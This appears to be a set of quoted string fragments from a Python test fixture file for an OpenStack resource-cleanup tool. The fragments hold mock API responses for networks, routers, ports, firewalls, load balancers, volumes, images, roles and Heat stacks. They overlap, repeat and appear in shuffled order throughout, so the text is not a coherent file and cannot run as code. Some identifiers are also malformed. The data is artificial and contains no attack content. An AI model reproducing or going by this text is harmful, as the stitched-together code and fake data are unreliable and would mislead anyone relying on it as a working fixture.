"\"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\": None",
"} ] } FIREWALL_LIST = { \"firewalls\": [ { \"status\": \"ACTIVE\", \"name\": \"fwass-test-1\",",
"'Volume Service', 'type': 'volume' }, { 'endpoints': [{ 'adminURL': 'http://admin:9292/v1', 'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL':",
"\"name\": \"router1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"external_gateway_info\":",
"} ROLE_LIST = {u'roles': [ {u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'},",
"u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}] } STORAGE_CONTAINERS_LIST = [ { \"count\":",
"STORAGE_OBJECTS_LIST_1 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\"",
"\"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[1], \"name\": \"\", \"tenant_id\":",
"} ], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\":",
"\"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[0]",
"{ \"My Server Name\": \"Apache1\" }, \"name\": \"new-server-test\", \"progress\": 0, \"status\": \"ACTIVE\", \"tenant_id\":",
"'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE = {",
"'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Volume Service', 'type': 'volume' }, { 'endpoints': [{",
"\"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\": None, \"display_name\": \"toto\", \"id\": VOLUMES_IDS[0], \"metadata\": {}, \"size\": 1, \"snapshot_id\":",
"}, \"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\" } ], \"id\":",
"\"http_method\": \"GET\", \"timeout\": 2, \"pools\": [], \"url_path\": \"/\", \"type\": \"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0] }",
"} NETWORKS_LIST = { \"networks\": [ { \"status\": \"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\",",
"None, \"id\": FLOATING_IPS_IDS[1] } ] } LBAAS_HEALTHMONITOR_LIST = { \"health_monitors\": [ { \"admin_state_up\":",
"[\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS",
"True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] } ROUTER_CLEAR_GATEWAY = { \"router\": { \"status\":",
"\"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\": \"\", \"display_name\": \"CirrOS v0.3.0\", \"id\": VOLUMES_IDS[1], \"metadata\": {}, \"size\": 1,",
"{ \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\",",
"\"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack2\", \"creation_time\": \"2015-03-03T17:34:21Z\", \"updated_time\":",
"{ \"stacks\": [ { \"description\": \"First test\", \"links\": [ { \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\":",
"True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False",
"\"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[0], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\":",
"\"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[1], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\":",
"'http://public:5000/v2.0', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Identity Service', 'type': 'identity' }, { 'endpoints':",
"\"ACTIVE\", \"external_gateway_info\": None, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] } }",
"{\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\", \"admin_state_up\": True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] } ROUTER_CLEAR_GATEWAY",
"[ { \"accessIPv4\": \"\", \"accessIPv6\": \"\", \"addresses\": { \"private\": [ { \"addr\": \"192.168.0.3\",",
"\"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\":",
"# License for the specific language governing permissions and limitations # under the",
"[\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\",",
"u'fail_reason': None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}], u'name': u'volumebackup-01',",
"\"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0] }, { \"router_id\": None, \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\":",
"\"id\": FLOATING_IPS_IDS[0] }, { \"router_id\": None, \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None, \"floating_ip_address\":",
"'EC2 Service', 'type': 'ec2' }, { 'endpoints': [{ 'adminURL': 'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0', 'publicURL':",
"} ] }, \"created\": \"2012-09-07T16:56:37Z\", \"flavor\": { \"id\": \"1\", \"links\": [ { \"href\":",
"http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,",
"in writing, software # distributed under the License is distributed on an \"AS",
"NETWORKS_IDS[1], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\", \"admin_state_up\": True,",
"False }, { \"status\": \"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID,",
"\"My Server Name\": \"Apache1\" }, \"name\": \"new-server-test\", \"progress\": 0, \"status\": \"ACTIVE\", \"tenant_id\": \"openstack\",",
"\"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\", \"admin_state_up\": True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True }",
"True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID, \"properties\": { \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\",",
"\"source_port\": None, \"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\":",
"\"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\",",
"\"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0] }, { \"router_id\":",
"'type': 'metering' }, { 'endpoints': [{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region':",
"}, { \"status\": \"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\":",
"\"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS = [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"]",
"\"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID },",
"{ \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.125\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[0],",
"\"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\":",
"the Apache License, Version 2.0 (the \"License\"); you may # not use this",
"'RegionOne'}], 'endpoints_links': [], 'name': 'Identity Service', 'type': 'identity' }, { 'endpoints': [{ 'adminURL':",
"\"snap-001\", \"display_description\": \"Daily backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\", \"size\": 10, \"created_at\": \"2012-02-29T03:50:07Z\" },",
"\"2012-02-29T03:50:07Z\" }, { \"id\": SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\", \"display_description\": \"Weekly backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\":",
"\"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\", \"admin_state_up\": True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] }",
"None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\",",
"\"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS",
"IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Image Service', 'type': 'image' },",
"[ { \"status\": \"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\":",
"] }, \"created\": \"2012-09-07T16:56:37Z\", \"flavor\": { \"id\": \"1\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/flavors/1\",",
"= { \"health_monitors\": [ { \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"delay\": 5, \"expected_codes\": \"200\",",
"'hello world'}] VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"]",
"\"updated\": \"2012-09-07T16:56:37Z\", \"user_id\": \"fake\" } ] } IMAGES_LIST = { \"images\": [ {",
"\"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\", \"admin_state_up\": True, \"tenant_id\":",
"\"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [ {",
"False, \"id\": FIREWALL_POLICY_IDS[0], \"description\": \"Testing firewall policy 1\" }, { \"name\": \"TestFireWallPolicy2\", \"firewall_rules\":",
"'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Volume Service', 'type':",
"\"tenant_id\": \"ANOTHER_PROJECT\" } ]} REMOVE_ROUTER_INTERFACE = { \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\",",
"\"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"},",
"[], \"url_path\": \"/\", \"type\": \"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0] } ] } LBAAS_VIP_LIST = {",
"WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the #",
"\"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 3714968, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:53\" }",
"} ]} REMOVE_ROUTER_INTERFACE = { \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\"",
"'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8'",
"\"ports\": [ { \"status\": \"DOWN\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID,",
"[], 'name': 'EC2 Service', 'type': 'ec2' }, { 'endpoints': [{ 'adminURL': 'http://admin:35357/v2.0', 'internalURL':",
"u'%s' % AUTH_URL, u'rel': u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby', u'type': u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf',",
"\"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[1], \"description\": \"Testing firewall policy 2\" } ]",
"\"\" } ] } METERING_LABEL_LIST = { \"metering_labels\": [ { \"tenant_id\": PROJECT_ID, \"description\":",
"\"bytes\": 14, \"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" } ] VOLUMES_LIST = { \"volumes\": [ {",
"'janeausten', 'name': 'foo'}, {'container': 'janeausten', 'name': 'bar'}, {'container': 'marktwain', 'name': 'hello world'}] VOLUMES_IDS",
"u'description': u'A Volume Backup', u'fail_reason': None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT,",
"\"enabled\": True, \"insufficient_data_actions\": [ \"http://site:8000/nodata\" ], \"name\": \"SwiftObjectAlarm\", \"ok_actions\": [ \"http://site:8000/ok\" ], \"project_id\":",
"4 } ] }, \"created\": \"2012-09-07T16:56:37Z\", \"flavor\": { \"id\": \"1\", \"links\": [ {",
"False }, { \"status\": \"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\", \"admin_state_up\": True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\",",
"\"name\": \"private\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[0], \"shared\": False }, { \"status\":",
"'<PASSWORD>' PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58' AUTH_URL = \"http://localhost:5000/v2.0\" ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58'",
"\"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True, \"min_disk\": 0, \"min_ram\":",
"sent from the Server PROJECT_SCOPED_TOKEN = { 'access': { 'serviceCatalog': [{ 'endpoints': [{",
"VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS =",
"\"available\", \"size\": 25, \"created_at\": \"2012-03-19T01:52:47Z\" } ] } VOLUME_BACKUPS_LIST = { u'backups': [",
"'type': 'ec2' }, { 'endpoints': [{ 'adminURL': 'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0', 'region':",
"(the \"License\"); you may # not use this file except in compliance with",
"\"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\" } ]} REMOVE_ROUTER_INTERFACE = { \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\",",
"u'name': u'anotherrole'}] } STORAGE_CONTAINERS_LIST = [ { \"count\": 0, \"bytes\": 0, \"name\": STORAGE_CONTAINERS[0]",
"'RegionOne'}], 'endpoints_links': [], 'name': 'Compute Service', 'type': 'compute' }, { 'endpoints': [{ 'adminURL':",
"\"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\": None,",
"}, { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.126\", \"protocol_port\": 80, \"port_id\":",
"\"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }",
"{ \"status\": \"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\", \"admin_state_up\": True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\",",
"\"bookmark\" } ] }, \"links\": [ { \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\" }, {",
"# # Unless required by applicable law or agreed to in writing, software",
"\"addr\": \"192.168.0.3\", \"version\": 4 } ] }, \"created\": \"2012-09-07T16:56:37Z\", \"flavor\": { \"id\": \"1\",",
"ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID,",
"\"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[0] }, { \"id\": LBAAS_MEMBER_IDS[1],",
"] } FIREWALL_LIST = { \"firewalls\": [ { \"status\": \"ACTIVE\", \"name\": \"fwass-test-1\", \"admin_state_up\":",
"ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT = 'http://public:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_PUBLIC_ENDPOINT = 'http://public:9292' STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT",
"None, \"id\": LBAAS_POOL_IDS[0] }, { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\",",
"\"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\":",
"python # -*- encoding: utf-8 -*- # # Copyright © 2014 Cloudwatt #",
"\"stack_status_reason\": \"\", \"stack_name\": \"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\": None, \"stack_status\": \"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" },",
"}, { 'endpoints': [{ 'adminURL': 'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud', 'region': 'RegionOne'}], 'endpoints_links':",
"} NEUTRON_PORTS = { 'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] + [ { \"admin_state_up\": True,",
"= [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\",",
"'Image Service', 'type': 'image' }, { 'endpoints': [{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL':",
"\"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\":",
"{ \"id\": LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1,",
"None, \"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\": \"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\" } ] STACKS_LIST = { \"stacks\":",
"u'backups': [ {u'availability_zone': u'nova', u'container': u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000', u'description': u'A Volume Backup', u'fail_reason':",
"\"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\",",
"'tenant': { 'description': '', 'enabled': True, 'id': PROJECT_ID, 'name': 'exampleproject' } }, 'user':",
"\"false\", \"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\": None, \"display_name\": \"toto\", \"id\": VOLUMES_IDS[0], \"metadata\": {}, \"size\": 1,",
"NEUTRON_PORTS = { 'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] + [ { \"admin_state_up\": True, \"allowed_address_pairs\":",
"] } LBAAS_MEMBER_LIST = { \"members\": [ { \"id\": LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\", \"protocol_port\":",
"METERING_LABEL_IDS[1] } ] } FIREWALL_POLICY_LIST = { \"firewall_policies\": [ { \"name\": \"TestFireWallPolicy1\", \"firewall_rules\":",
"\"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None,",
"IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID",
"}, { \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\":",
"\"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\":",
"\"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[0], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\":",
"'metering' }, { 'endpoints': [{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}],",
"[ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\" } ], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1] },",
"\"5c136348-5550-4ec5-8bd6-b83241844db3\" }, { \"description\": \"Second test\", \"links\": [ { \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\"",
"\"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0]",
"\"id\": FIREWALL_RULE_IDS[1], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\":",
